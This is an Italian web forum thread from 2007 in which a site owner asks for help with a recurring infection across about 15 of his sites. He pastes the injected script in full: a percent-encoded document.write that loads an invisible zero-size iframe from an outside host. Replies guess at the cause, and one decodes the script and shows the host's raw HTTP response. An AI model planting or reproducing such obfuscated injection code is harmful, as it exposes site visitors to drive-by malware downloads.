codice maligno nelle mie pagine web...

[cuba74]

Salve a tutti, sono un nuovo iscritto....ho un grosso problema spero che Voi possiate aiutarmi.
Non sono un grosso esperto ma come seconda attività creo e gestisco alcuni siti web (circa 15) e ultimamente in tutti i miei siti si è inserito un codice "maligno" che vi riporto:

<body bgcolor="#356893" link="#FF9933" vlink="#FF9933" alink="#FF9933"><script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E %76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%6 4%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20% 68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65 %3E'));
//-->
</script>


tale codice, credo, provvede ad aprire un altro indirizzo effettuando un download di qualke file exe o rabba simile, sta di fatto che i miei antivirus lo rivelano!
nonstante io provveda a rimuoverlo da tutte le pagine html , per magia, dopo un po', ricomapare....
Ho provato anche a cambiare le psw ftp del mio host .....ma niente!
l'unica soluzione adesso da me adottata è stata la completa rimozione di tutti i file presenti nel mio spazio con conseguente frustrante disservizio per i miei cliente!
Anche la pagina semplice "sito in manutenzione" dopo un po' viene infettata!
P.s. ho anche formattato il mio pc e analizzato per bene tutte le mie pagine html.
Spero che qualcuno possa aiutarmi! Saluti Antonello

[windino]

Ciao
Non mi intendo di come possa venire inserito codice nelle pagine web però, tannt'è che stavo leggendo un pò e di sabato pomeriggio c'è in giro poca gente penso:
nelle pagine hai inserito qualche contatore di statistiche free ? talvolta sono questi i primi d controllare. A me successe tempo fa per cui te ne faccio voce
Per altre cose non saprei dire per cui lascio il problema a qualcuno competente
Ciao

[EvoSistemi]

si i contatori free spesso causano questi problemi

[cuba74]

mi sai dare qualke altra informazione a riguardo? Mi hai detto che probabilmente è stato icausato da qualke contatore free. Io in realtà ho un sito che utilizza SchinyStat, ho provato a rimuoverlo, anzi, ho addirittura eliminato tutti i file presenti nel mio host, ho inserito solo una pagina di cortesia con la scritta "sito in manutenzione".....ma niente dopo un po di tempo il codice ricompare per incacanto! NOn riesco a capire come agisce, se via ftp o altro! Se puoi aiutarmi te ne sarei grato!

[EvoSistemi]

Originariamente inviato da cuba74
mi sai dare qualke altra informazione a riguardo? Mi hai detto che probabilmente è stato icausato da qualke contatore free. Io in realtà ho un sito che utilizza SchinyStat, ho provato a rimuoverlo, anzi, ho addirittura eliminato tutti i file presenti nel mio host, ho inserito solo una pagina di cortesia con la scritta "sito in manutenzione".....ma niente dopo un po di tempo il codice ricompare per incacanto! NOn riesco a capire come agisce, se via ftp o altro! Se puoi aiutarmi te ne sarei grato!

la butto la ... probabilmente usi un hosting free .... e magari questo provider manda banner o altro sul tuo spazio web ... in questo caso puoi rimuovere quello che vuoi ma non concluderesti nulla lo stesso ... è cosi ?

[Habanero]

Originariamente inviato da cuba74
mi sai dare qualke altra informazione a riguardo? Mi hai detto che probabilmente è stato icausato da qualke contatore free. Io in realtà ho un sito che utilizza SchinyStat, ho provato a rimuoverlo, anzi, ho addirittura eliminato tutti i file presenti nel mio host, ho inserito solo una pagina di cortesia con la scritta "sito in manutenzione".....ma niente dopo un po di tempo il codice ricompare per incacanto! NOn riesco a capire come agisce, se via ftp o altro! Se puoi aiutarmi te ne sarei grato!

potresti postare il link a uno di questi siti?





EvoSistemi hai un messaggio privato

[mark2x]

Quel codice Javascript carica la pagina: http://gazenvagen.com/img/index.php in un iframe invisibile.

Lo script remoto non ritorna nulla, così ho telnettato un po', dando un occhio all'HTTP raw.
Ecco cosa viene ritornato:

codice:

HTTP/1.1 200 OK
Date: Wed, 31 Oct 2007 03:41:01 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.8b PHP/4.4.7 mod_perl/1. 29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.7
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
X-Pad: avoid browser bug

0

Curioso lo header in grassetto.


Come fanno ad inserire tale JS nelle pagine del tuo sito: io credo che o l'hoster sia compromesso oppure il tuo sito ha falle XSS (ipotesi che però è un po' debole visto il punto dov'è inserito lo script, cioè dopo il tag body).

Come costruisci la pagina HTML? Prendi TUTTO il contenuto da database?
La cartella dove risiedono i file del tuo programma Web che permessi ha?

[cuba74]

Io un contatore statistice free (shynistat), attraverso il quale ho dovuto inserire un paio di righe in js, potrebbe essere questa la falla?

[mark2x]

Non credo.

[cuba74]

Se hai qualke minuto ti puoi legger l'articolo sotto linkato?
http://www.zeusnews.com/index.php3?a...325&numero=906
Fammi sapere che ne pensi! Grazie